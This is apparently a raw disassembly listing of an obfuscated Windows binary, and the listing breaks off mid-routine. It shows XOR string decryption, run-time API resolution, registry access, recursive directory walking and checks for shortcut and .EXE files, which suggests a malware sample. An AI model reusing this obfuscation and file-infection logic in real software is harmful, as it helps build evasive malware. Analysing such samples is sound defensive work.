mov edx, ds:10013268h
lea eax, [eax+edx+3FAh]
cmp [ebp+arg_24], eax
jnb short loc_41BF38
mov eax, ds:100131B0h
add eax, 95h
movsx edx, word ptr ds:10013150h
add eax, edx
cmp [ebp+arg_24], eax
jnz loc_41C198
loc_41BF38: ; CODE XREF: sub_41BE82+98�j
movsx eax, word ptr ds:100131C0h
add eax, 30D3Ch
cmp [ebp+arg_24], eax
ja loc_41C198
lea eax, [ebp+arg_18]
push eax
lea eax, [ebp+arg_8]
push eax
call dword ptr ds:10012780h
mov [ebp+var_260], eax
mov eax, ds:1001323Ch
add eax, ds:100131BCh
sub eax, 0Eh
cmp [ebp+var_260], eax
jge short loc_41BF84
lea edi, [ebp+var_268]
lea esi, [ebp+arg_18]
movsd
movsd
jmp short loc_41BF8F
; ---------------------------------------------------------------------------
loc_41BF84: ; CODE XREF: sub_41BE82+F3�j
lea edi, [ebp+var_268]
lea esi, [ebp+arg_8]
movsd
movsd
loc_41BF8F: ; CODE XREF: sub_41BE82+100�j
lea eax, [ebp+var_258]
push eax
lea eax, [ebp+var_268]
push eax
call dword ptr ds:10012778h
movzx eax, [ebp+var_24E]
movzx edx, [ebp+var_250]
movsx ecx, word ptr ds:10013174h
add ecx, 35h
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_252]
movsx ecx, word ptr ds:100131A4h
movsx esi, word ptr ds:10013124h
lea ecx, [ecx+esi+0Bh]
imul edx, ecx
mov ecx, ds:10013154h
add ecx, 35h
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_256]
mov ecx, ds:10013268h
add ecx, 1Ah
imul edx, ecx
mov ecx, ds:10013140h
add ecx, 6
add ecx, ds:1001326Ch
imul edx, ecx
movsx ecx, word ptr ds:100130D8h
mov esi, ds:10013168h
lea ecx, [ecx+esi+3Ah]
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_258]
mov ecx, ds:10013270h
add ecx, 8
imul edx, ecx
movsx ecx, word ptr ds:10013150h
add ecx, 16h
imul edx, ecx
mov ecx, ds:100130C8h
add ecx, 0Fh
add ecx, ds:10013194h
imul edx, ecx
mov ecx, ds:1001310Ch
add ecx, 33h
add ecx, ds:100131A0h
imul edx, ecx
add eax, edx
mov [ebp+var_25C], eax
mov edx, ds:1000D024h
cmp eax, edx
ja loc_41C198
sub edx, eax
movsx eax, word ptr ds:1001327Ch
mov ecx, ds:10013128h
lea eax, [eax+ecx+7]
cmp edx, eax
jnb loc_41C198
movsx eax, word ptr ds:10013264h
add eax, 9Bh
cmp [ebp+arg_24], eax
jz short loc_41C0BD
push 0
push [ebp+arg_0]
call sub_41B354
add esp, 8
jmp loc_41C198
; ---------------------------------------------------------------------------
loc_41C0BD: ; CODE XREF: sub_41BE82+227�j
push 1
push [ebp+arg_0]
call sub_41B354
add esp, 8
jmp loc_41C198
; ---------------------------------------------------------------------------
loc_41C0CF: ; CODE XREF: sub_41BE82+68�j
cmp [ebp+var_112], 2Eh
jz loc_41C194
push 10014246h
call sub_41C914
lea edi, [ebp+var_112]
push edi
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call dword ptr ds:10012634h
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_41BE82
add esp, 158h
jmp short loc_41C194
; ---------------------------------------------------------------------------
loc_41C128: ; CODE XREF: sub_41BE82+314�j
lea eax, [ebp+var_13E]
push eax
push [ebp+var_248]
call dword ptr ds:1000E004h
mov ebx, eax
or ebx, ebx
jz short loc_41C198
cmp [ebp+var_112], 2Eh
jz short loc_41C194
push 1001423Dh
call sub_41C914
lea edi, [ebp+var_112]
push edi
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call dword ptr ds:10012634h
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_41BE82
add esp, 158h
loc_41C194: ; CODE XREF: sub_41BE82+254�j
; sub_41BE82+2A4�j ...
or ebx, ebx
jnz short loc_41C128
loc_41C198: ; CODE XREF: sub_41BE82+7B�j
; sub_41BE82+B0�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41BE82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C19D proc near ; CODE XREF: sub_41D764+190�p
var_12110 = byte ptr -12110h
var_1210C = word ptr -1210Ch
var_1210A = word ptr -1210Ah
var_12108 = dword ptr -12108h
var_12104 = byte ptr -12104h
var_12000 = word ptr -12000h
var_11FFE = byte ptr -11FFEh
var_1FFF = byte ptr -1FFFh
var_1FB3 = byte ptr -1FB3h
var_1FB2 = byte ptr -1FB2h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 12110h
call sub_423379
push ebx
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12104]
push eax
call sub_423399
lea ecx, [ebp+var_12104]
or eax, 0FFFFFFFFh
loc_41C1C5: ; CODE XREF: sub_41C19D+2D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41C1C5
movsx ebx, word ptr ds:10013240h
movsx edx, word ptr ds:100131C0h
add ebx, edx
sub ebx, 5
mov esi, eax
sub esi, ebx
movsx ebx, word ptr ds:100130FCh
movsx edx, word ptr ds:10013160h
add ebx, edx
sub ebx, 7
mov [ebp+esi+var_12104], bl
push 0
mov eax, ds:100131E8h
add eax, ds:100130B8h
sub eax, 4
push eax
push 3
push 0
mov eax, ds:100130A0h
movsx edx, word ptr ds:100131B4h
add eax, edx
sub eax, 8
push eax
push 80000001h
lea eax, [ebp+var_12104]
push eax
call dword ptr ds:10012788h
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_41C473
push 0
lea eax, [ebp+var_12110]
push eax
push 1FFFh
lea eax, [ebp+var_1FFF]
push eax
push edi
call dword ptr ds:1000D028h
mov [ebp+var_12108], eax
push edi
call dword ptr ds:10011654h
mov eax, ds:100131D0h
sub eax, 7
cmp [ebp+var_12108], eax
jz loc_41C473
cmp [ebp+var_1FFF], 4Ch
jnz loc_41C473
movzx esi, [ebp+var_1FB3]
movzx ebx, [ebp+var_1FB2]
movzx ebx, bx
shl ebx, 8
or esi, ebx
mov [ebp+var_1210A], si
movzx eax, [ebp+var_1210A]
movsx edx, word ptr ds:10013264h
mov ecx, ds:100131E4h
lea edx, [edx+ecx+3Fh]
add eax, edx
movsx edx, word ptr ds:10013150h
add edx, ds:1001310Ch
sub edx, 0Ch
add eax, edx
mov [ebp+var_12000], ax
movzx eax, [ebp+var_12000]
movsx eax, [ebp+eax+var_1FFF]
mov edx, ds:1001326Ch
sub edx, 9
cmp eax, edx
jz loc_41C473
movzx eax, [ebp+var_12000]
movsx edx, word ptr ds:100130BCh
dec edx
add eax, edx
movsx eax, [ebp+eax+var_1FFF]
mov edx, ds:1001313Ch
sub edx, 2
cmp eax, edx
jnz loc_41C473
movzx eax, [ebp+var_12000]
mov edx, ds:10013268h
add edx, 0Ch
mov ecx, eax
add ecx, edx
movzx edx, [ebp+ecx+var_1FFF]
movsx esi, word ptr ds:100131FCh
lea esi, [eax+esi+0Ch]
movzx esi, [ebp+esi+var_1FFF]
movzx esi, si
shl esi, 8
mov ebx, edx
or ebx, esi
mov esi, ebx
movzx esi, si
mov ebx, eax
add ebx, esi
mov esi, ebx
mov [ebp+var_1210C], si
movzx eax, [ebp+var_1210C]
lea eax, [ebp+eax+var_1FFF]
push eax
lea eax, [ebp+var_11FFE]
push eax
call sub_423399
lea ecx, [ebp+var_11FFE]
or eax, 0FFFFFFFFh
loc_41C394: ; CODE XREF: sub_41C19D+1FC�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41C394
mov edi, eax
movsx eax, word ptr ds:10013100h
add eax, ds:10013228h
sub eax, 2
mov edx, edi
sub edx, eax
cmp [ebp+edx+var_11FFE], 2Eh
jnz short loc_41C438
mov eax, ds:100130C8h
movsx edx, word ptr ds:10013218h
add eax, edx
sub eax, 2
mov edx, edi
sub edx, eax
movsx eax, [ebp+edx+var_11FFE]
push eax
call dword ptr ds:1000D030h
add esp, 4
cmp eax, 45h
jnz short loc_41C438
mov esi, ds:100131E8h
movsx ebx, word ptr ds:10013230h
add esi, ebx
sub esi, 5
mov ebx, edi
sub ebx, esi
movsx esi, [ebp+ebx+var_11FFE]
push esi
call dword ptr ds:1000D030h
add esp, 4
cmp eax, 58h
jnz short loc_41C438
mov esi, ds:10013158h
sub esi, 8
mov ebx, edi
sub ebx, esi
movsx esi, [ebp+ebx+var_11FFE]
push esi
call dword ptr ds:1000D030h
add esp, 4
cmp eax, 45h
jz short loc_41C43A
loc_41C438: ; CODE XREF: sub_41C19D+21C�j
; sub_41C19D+248�j ...
jmp short loc_41C473
; ---------------------------------------------------------------------------
loc_41C43A: ; CODE XREF: sub_41C19D+299�j
push 10014238h
call sub_41C914
push eax
lea edi, [ebp+var_11FFE]
push edi
call dword ptr ds:1000D020h
mov eax, ds:10013168h
movsx edx, word ptr ds:100131A4h
add eax, edx
sub eax, 7
push eax
lea eax, [ebp+var_11FFE]
push eax
call sub_4206A9
add esp, 14h
loc_41C473: ; CODE XREF: sub_41C19D+9E�j
; sub_41C19D+DB�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41C19D endp
; ---------------------------------------------------------------------------
dd 4001B8h, 18C280h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C480 proc near ; CODE XREF: .data:loc_41896F�p
var_252 = byte ptr -252h
var_236 = dword ptr -236h
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
lea eax, [ebp+var_114]
push eax
mov eax, ds:100130A0h
sub eax, 4
push eax
push 0
push 20h
push 0
call dword ptr ds:1000FA44h
lea eax, [ebp+var_10]
push eax
call dword ptr ds:1001025Ch
movzx eax, [ebp+var_6]
movzx edx, [ebp+var_8]
mov ecx, ds:10013274h
add ecx, 33h
add ecx, ds:100131ECh
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_A]
mov ecx, ds:100131ACh
add ecx, 0Ch
movsx ebx, word ptr ds:1001322Ch
add ecx, ebx
imul edx, ecx
mov ecx, ds:100130F4h
add ecx, 35h
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_E]
mov ecx, ds:1001309Ch
add ecx, 19h
imul edx, ecx
movsx ecx, word ptr ds:100131FCh
add ecx, 13h
imul edx, ecx
mov ecx, ds:100131F8h
add ecx, 39h
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_10]
movsx ecx, word ptr ds:10013104h
movsx ebx, word ptr ds:10013260h
lea ecx, [ecx+ebx+2]
imul edx, ecx
mov ecx, ds:1001311Ch
add ecx, 16h
add ecx, ds:10013090h
imul edx, ecx
mov ecx, ds:10013268h
add ecx, 0Eh
movsx ebx, word ptr ds:10013144h
add ecx, ebx
imul edx, ecx
mov ecx, ds:10013110h
add ecx, 37h
add ecx, ds:10013238h
imul edx, ecx
add eax, edx
mov ds:1000D024h, eax
mov eax, ds:100130E4h
sub eax, 8
mov [ebp+var_236], eax
lea esi, [ebp+var_252]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_114]
push edi
call sub_41BE82
add esp, 144h
pop edi
pop esi
pop ebx
leave
retn
sub_41C480 endp
; ---------------------------------------------------------------------------
dd 4001B8h, 8C280h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 1000F608h
call dword ptr ds:1000FA3Ch
mov eax, ds:1000F608h
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_41C5D3 proc near ; CODE XREF: .data:0041F046�p
push edi
push 10014228h
call sub_41C914
pop ecx
push eax
call dword ptr ds:1000F5E8h
mov ds:100132B8h, eax
test eax, eax
jnz short loc_41C606
push 10014218h
call sub_41C914
pop ecx
push eax
call dword ptr ds:10010244h
mov ds:100132B8h, eax
loc_41C606: ; CODE XREF: sub_41C5D3+1A�j
push 10014207h
call sub_41C914
push eax
push dword ptr ds:100132B8h
call dword ptr ds:1000F1F8h
mov ds:1000F5ECh, eax
push 100141F3h
call sub_41C914
push eax
push dword ptr ds:100132B8h
call dword ptr ds:1000F1F8h
mov ds:1000D03Ch, eax
push 100141E4h
call sub_41C914
push eax
push dword ptr ds:100132B8h
call dword ptr ds:1000F1F8h
mov ds:10012618h, eax
push 100141D4h
call sub_41C914
add esp, 10h
push eax
push dword ptr ds:100132B8h
call dword ptr ds:1000F1F8h
mov ds:1000F5F0h, eax
pop edi
retn
sub_41C5D3 endp
; =============== S U B R O U T I N E =======================================
sub_41C67B proc near ; CODE XREF: .data:0041F041�p
push edi
push 100141C5h
call sub_41C914
pop ecx
push eax
call dword ptr ds:1000F5E8h
mov ds:100132B4h, eax
test eax, eax
jnz short loc_41C6AE
push 100141B6h
call sub_41C914
pop ecx
push eax
call dword ptr ds:10010244h
mov ds:100132B4h, eax
loc_41C6AE: ; CODE XREF: sub_41C67B+1A�j
push 100141A2h
call sub_41C914
pop ecx
push eax
push dword ptr ds:100132B4h
call dword ptr ds:1000F1F8h
mov ds:1000FA44h, eax
pop edi
retn
sub_41C67B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C6CD proc near ; CODE XREF: sub_41B354+26D�p
var_54 = byte ptr -54h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 54h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_41C6E4
add eax, 3Fh
loc_41C6E4: ; CODE XREF: sub_41C6CD+12�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
call sub_41A4FB
pop ecx
mov [ebp+var_14], eax
mov edi, [ebp+arg_4]
mov edx, ds:10013248h
add edx, 3Ch
add edx, ds:10013270h
mov eax, edi
add eax, edx
jge short loc_41C711
add eax, 3Fh
loc_41C711: ; CODE XREF: sub_41C6CD+3F�j
sar eax, 6
mov edi, ds:10013288h
add edi, 3Ah
mov edx, eax
imul edx, edi
push edx
push [ebp+var_14]
call dword ptr ds:1000D02Ch
push [ebp+arg_4]
push esi
push [ebp+var_14]
call dword ptr ds:10011638h
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
call sub_422A6F
mov esi, [ebp+var_14]
mov ebx, ds:10013184h
sub ebx, 2
jmp short loc_41C76F
; ---------------------------------------------------------------------------
loc_41C753: ; CODE XREF: sub_41C6CD+BC�j
push esi
lea eax, [ebp+var_10]
push eax
call sub_422A96
mov eax, ds:100131E8h
add eax, 39h
add eax, ds:1001314Ch
lea esi, [esi+eax]
inc ebx
loc_41C76F: ; CODE XREF: sub_41C6CD+84�j
mov edi, [ebp+arg_4]
movsx edx, word ptr ds:10013170h
lea eax, [edi+edx+3Eh]
test eax, eax
jge short loc_41C784
add eax, 3Fh
loc_41C784: ; CODE XREF: sub_41C6CD+B2�j
sar eax, 6
cmp ebx, eax
jl short loc_41C753
push [ebp+var_14]
call sub_418731
lea eax, [ebp+var_54]
push eax
push [ebp+arg_8]
call sub_41A1D1
movsx eax, word ptr ds:100130B0h
add eax, 9
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
call dword ptr ds:1001264Ch
add esp, 18h
movsx edi, word ptr ds:10013144h
add edi, ds:1001314Ch
sub edi, 0Ch
cmp eax, edi
jz short loc_41C7D4
xor eax, eax
inc eax
jmp short loc_41C7D6
; ---------------------------------------------------------------------------
loc_41C7D4: ; CODE XREF: sub_41C6CD+100�j
xor eax, eax
loc_41C7D6: ; CODE XREF: sub_41C6CD+105�j
pop edi
pop esi
pop ebx
leave
retn
sub_41C6CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C7DB proc near ; CODE XREF: sub_41F596+197�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push edi
lea eax, [ebp+var_4]
push eax
push 20019h
mov eax, ds:10013280h
movsx edx, word ptr ds:10013100h
add eax, edx
sub eax, 7
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword ptr ds:1000F5ECh
mov edi, eax
or edi, edi
jz short loc_41C811
xor eax, eax
jmp short loc_41C83E
; ---------------------------------------------------------------------------
loc_41C811: ; CODE XREF: sub_41C7DB+30�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call dword ptr ds:1000D03Ch
mov edi, eax
push [ebp+var_4]
call dword ptr ds:10012618h
or edi, edi
jz short loc_41C83B
xor eax, eax
jmp short loc_41C83E
; ---------------------------------------------------------------------------
loc_41C83B: ; CODE XREF: sub_41C7DB+5A�j
xor eax, eax
inc eax
loc_41C83E: ; CODE XREF: sub_41C7DB+34�j
; sub_41C7DB+5E�j
pop edi
leave
retn
sub_41C7DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C841 proc near ; CODE XREF: sub_418999+DA�p
; sub_418999+510�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, [ebp+arg_4]
push ebx
call dword ptr ds:1000D000h
mov edi, eax
push 0
push 0
movsx eax, word ptr ds:100130CCh
add eax, 1FF8h
push eax
push esi
push edi
push ebx
mov eax, ds:1001312Ch
add eax, ds:10013194h
sub eax, 11h
push eax
push 0
call dword ptr ds:1000D00Ch
mov eax, ds:1001319Ch
add eax, ds:1001321Ch
sub eax, 0Eh
mov [esi+edi], al
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41C841 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+0Ch]
mov edi, [ebp+10h]
push 10014AC8h
push esi
call dword ptr ds:10012648h
or eax, eax
jz short loc_41C8C5
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_41C90D
; ---------------------------------------------------------------------------
loc_41C8C5: ; CODE XREF: .data:0041C8B3�j
push 10014A48h
push esi
call dword ptr ds:10012648h
or eax, eax
jz short loc_41C8E5
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_41C90D
; ---------------------------------------------------------------------------
loc_41C8E5: ; CODE XREF: .data:0041C8D3�j
push 10014A08h
push esi
call dword ptr ds:10012648h
or eax, eax
jz short loc_41C905
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_41C90D
; ---------------------------------------------------------------------------
loc_41C905: ; CODE XREF: .data:0041C8F3�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_41C90D: ; CODE XREF: .data:0041C8C3�j
; .data:0041C8E3�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C914 proc near ; CODE XREF: sub_418999+298�p
; sub_418999+38B�p ...
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp dword ptr ds:10013290h, 0
jnz short loc_41C93C
push 10012BC0h
call dword ptr ds:1000E008h
mov dword ptr ds:10013290h, 1
loc_41C93C: ; CODE XREF: sub_41C914+11�j
movsx esi, word ptr ds:100131F0h
movsx ebx, word ptr ds:100130CCh
add esi, ebx
sub esi, 7
movzx ebx, byte ptr [edi]
movzx edx, byte ptr [edi+1]
movzx edx, dx
shl edx, 8
or ebx, edx
movzx ebx, bx
add esi, ebx
mov [ebp+var_4], si
movzx eax, [ebp+var_4]
cmp eax, ds:100130B8h
jz short loc_41C9EF
push 10012BC0h
call dword ptr ds:10012660h
mov eax, ds:10013220h
dec eax
mov [ebp+var_2], ax
jmp short loc_41C99F
; ---------------------------------------------------------------------------
loc_41C98A: ; CODE XREF: sub_41C914+95�j
movzx eax, [ebp+var_2]
add eax, edi
movsx edx, byte ptr [eax]
movsx ecx, byte ptr [edi+2]
xor edx, ecx
mov [eax], dl
inc [ebp+var_2]
loc_41C99F: ; CODE XREF: sub_41C914+74�j
movzx eax, [ebp+var_2]
movzx edx, [ebp+var_4]
cmp eax, edx
jl short loc_41C98A
movsx eax, word ptr ds:10013170h
sub eax, 2
mov edx, ds:100130F8h
add edx, ds:1001312Ch
sub edx, 0Fh
mov [edi+eax], dl
mov eax, ds:10013128h
sub eax, 8
mov edx, ds:1001325Ch
movsx ecx, word ptr ds:100131F0h
add edx, ecx
sub edx, 0Bh
mov [edi+eax], dl
push 10012BC0h
call dword ptr ds:10011650h
loc_41C9EF: ; CODE XREF: sub_41C914+5D�j
lea eax, [edi+3]
pop edi
pop esi
pop ebx
leave
retn
sub_41C914 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C9F7 proc near ; CODE XREF: sub_420477+E�p
; sub_420477+1E1�p
var_10088 = dword ptr -10088h
var_10084 = dword ptr -10084h
var_10080 = dword ptr -10080h
var_1007C = dword ptr -1007Ch
var_10078 = word ptr -10078h
var_10070 = dword ptr -10070h
var_10068 = dword ptr -10068h
var_10064 = dword ptr -10064h
var_10060 = dword ptr -10060h
var_10059 = byte ptr -10059h
var_10058 = dword ptr -10058h
var_10054 = dword ptr -10054h
var_10050 = dword ptr -10050h
var_1004C = dword ptr -1004Ch
var_10048 = dword ptr -10048h
var_10043 = byte ptr -10043h
var_44 = dword ptr -44h
var_40 = word ptr -40h
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 10088h
call sub_423379
push ebx
push esi
push edi
mov [ebp+var_40], 8
push 10014194h
call sub_41FB74
pop ecx
push eax
call dword ptr ds:1000D044h
mov [ebp+var_38], eax
lea eax, [ebp+var_2C]
push eax
lea esi, [ebp+var_40]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_0]
push edi
mov edi, [edi]
call dword ptr [edi+30h]
mov ebx, eax
movsx eax, word ptr ds:100130FCh
add eax, ds:10013154h
sub eax, 0Dh
cmp ebx, eax
jz short loc_41CA5B
xor eax, eax
jmp loc_41D087
; ---------------------------------------------------------------------------
loc_41CA5B: ; CODE XREF: sub_41C9F7+5B�j
lea eax, [ebp+var_24]
push eax
push 10014A68h
mov eax, [ebp+var_2C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word ptr ds:10013208h
add eax, ds:1001314Ch
sub eax, 0Bh
cmp ebx, eax
jnz loc_41D07C
lea eax, [ebp+var_28]
push eax
mov eax, [ebp+var_24]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
mov eax, ds:10013090h
movsx edx, word ptr ds:10013170h
add eax, edx
sub eax, 5
cmp ebx, eax
jnz loc_41D073
and [ebp+var_44], 0
movsx eax, word ptr ds:10013264h
sub eax, 9
mov [ebp+var_1C], eax
jmp loc_41D067
; ---------------------------------------------------------------------------
loc_41CAC9: ; CODE XREF: sub_41C9F7+676�j
mov [ebp+var_18], 2
mov eax, [ebp+var_1C]
mov [ebp+var_10], eax
lea eax, [ebp+var_4]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_24]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
mov eax, ds:1001325Ch
add eax, ds:10013188h
sub eax, 8
cmp ebx, eax
jnz loc_41D064
and [ebp+var_10048], 0
lea eax, [ebp+var_10048]
push eax
push 10014A78h
mov eax, [ebp+var_4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word ptr ds:100130A4h
movsx edx, word ptr ds:100131C0h
add eax, edx
sub eax, 0Ah
cmp ebx, eax
jnz loc_41D040
cmp [ebp+var_10048], 0
jz loc_41D040
lea eax, [ebp+var_20]
push eax
mov eax, [ebp+var_10048]
push eax
mov edi, [eax]
call dword ptr [edi+0F8h]
mov ebx, eax
or ebx, ebx
jnz loc_41D040
lea eax, [ebp+var_10043]
push eax
push [ebp+var_20]
call sub_41C841
mov eax, ds:10013288h
sub eax, 5
push eax
push 10010230h
lea eax, [ebp+var_10043]
push eax
call sub_4188C2
add esp, 14h
mov edi, ds:10013280h
add edi, 0FFFBh
cmp eax, edi
jz loc_41D040
cmp [ebp+arg_4], 0
jz short loc_41CBE2
mov eax, [ebp+var_10048]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
xor eax, eax
inc eax
jmp loc_41D087
; ---------------------------------------------------------------------------
loc_41CBE2: ; CODE XREF: sub_41C9F7+1CC�j
and [ebp+var_1007C], 0
lea eax, [ebp+var_1007C]
push eax
push 10014A98h
mov eax, [ebp+var_4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10013184h
movsx edx, word ptr ds:10013240h
add eax, edx
sub eax, 4
cmp ebx, eax
jnz loc_41D040
mov [ebp+var_10059], 44h
push 1001418Bh
call sub_41C914
movsx edi, word ptr ds:100130D8h
dec edi
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_4188C2
add esp, 10h
movsx esi, word ptr ds:100130CCh
add esi, 0FFF8h
cmp eax, esi
jz short loc_41CC5F
mov [ebp+var_10059], 43h
loc_41CC5F: ; CODE XREF: sub_41C9F7+25F�j
push 10014183h
call sub_41C914
movsx edi, word ptr ds:100131FCh
sub edi, 4
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_4188C2
add esp, 10h
mov esi, ds:100130DCh
inc esi
mov edi, eax
add edi, esi
mov [ebp+var_10068], edi
mov [ebp+var_10054], edi
loc_41CC9B: ; CODE XREF: sub_41C9F7+2BA�j
mov eax, [ebp+var_10054]
cmp [ebp+eax+var_10043], 26h
jz short loc_41CCB3
inc [ebp+var_10054]
jmp short loc_41CC9B
; ---------------------------------------------------------------------------
loc_41CCB3: ; CODE XREF: sub_41C9F7+2B2�j
mov eax, [ebp+var_10054]
movsx edx, word ptr ds:10013150h
movsx ecx, word ptr ds:100131F0h
add edx, ecx
sub edx, 0Bh
mov [ebp+eax+var_10043], dl
mov eax, [ebp+var_10068]
lea eax, [ebp+eax+var_10043]
push eax
call dword ptr ds:1000D054h
mov [ebp+var_10080], eax
push 1001417Ch
call sub_41C914
movsx edi, word ptr ds:1001322Ch
movsx esi, word ptr ds:10013260h
add edi, esi
sub edi, 8
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_4188C2
add esp, 14h
mov esi, ds:10013214h
sub esi, 6
mov edi, eax
add edi, esi
mov [ebp+var_10068], edi
mov [ebp+var_10054], edi
loc_41CD34: ; CODE XREF: sub_41C9F7+353�j
mov eax, [ebp+var_10054]
cmp [ebp+eax+var_10043], 26h
jz short loc_41CD4C
inc [ebp+var_10054]
jmp short loc_41CD34
; ---------------------------------------------------------------------------
loc_41CD4C: ; CODE XREF: sub_41C9F7+34B�j
mov eax, [ebp+var_10054]
mov edx, ds:10013238h
mov [ebp+eax+var_10043], dl
mov eax, [ebp+var_10068]
lea eax, [ebp+eax+var_10043]
push eax
call dword ptr ds:1000D054h
pop ecx
mov [ebp+var_10060], eax
movsx eax, word ptr ds:10013118h
sub eax, 3
cmp [ebp+var_10080], eax
ja short loc_41CDF9
movsx eax, word ptr ds:1001322Ch
add eax, ds:1001326Ch
sub eax, 10h
mov [ebp+var_1004C], eax
jmp short loc_41CDE5
; ---------------------------------------------------------------------------
loc_41CDA4: ; CODE XREF: sub_41C9F7+400�j
mov edi, [ebp+var_1004C]
mov esi, edi
shl esi, 2
cmp dword ptr ds:1000E130h[esi], 0
jz short loc_41CDDF
mov edx, [ebp+var_10060]
cmp ds:1000D060h[esi], edx
jnz short loc_41CDDF
mov dl, ds:1000F200h[edi]
cmp dl, [ebp+var_10059]
jnz short loc_41CDDF
and dword ptr ds:1000E130h[edi*4], 0
loc_41CDDF: ; CODE XREF: sub_41C9F7+3C0�j
; sub_41C9F7+3CF�j ...
inc [ebp+var_1004C]
loc_41CDE5: ; CODE XREF: sub_41C9F7+3AB�j
movsx eax, word ptr ds:10013178h
add eax, 3E4h
cmp [ebp+var_1004C], eax
jb short loc_41CDA4
loc_41CDF9: ; CODE XREF: sub_41C9F7+393�j
call dword ptr ds:10012770h
mov [ebp+var_10064], eax
mov eax, ds:10013280h
sub eax, 4
mov [ebp+var_10050], eax
jmp short loc_41CE66
; ---------------------------------------------------------------------------
loc_41CE15: ; CODE XREF: sub_41C9F7+47F�j
mov edi, [ebp+var_10050]
shl edi, 2
cmp dword ptr ds:1000E130h[edi], 0
jz short loc_41CE60
mov edi, ds:10011660h[edi]
movsx esi, word ptr ds:10013104h
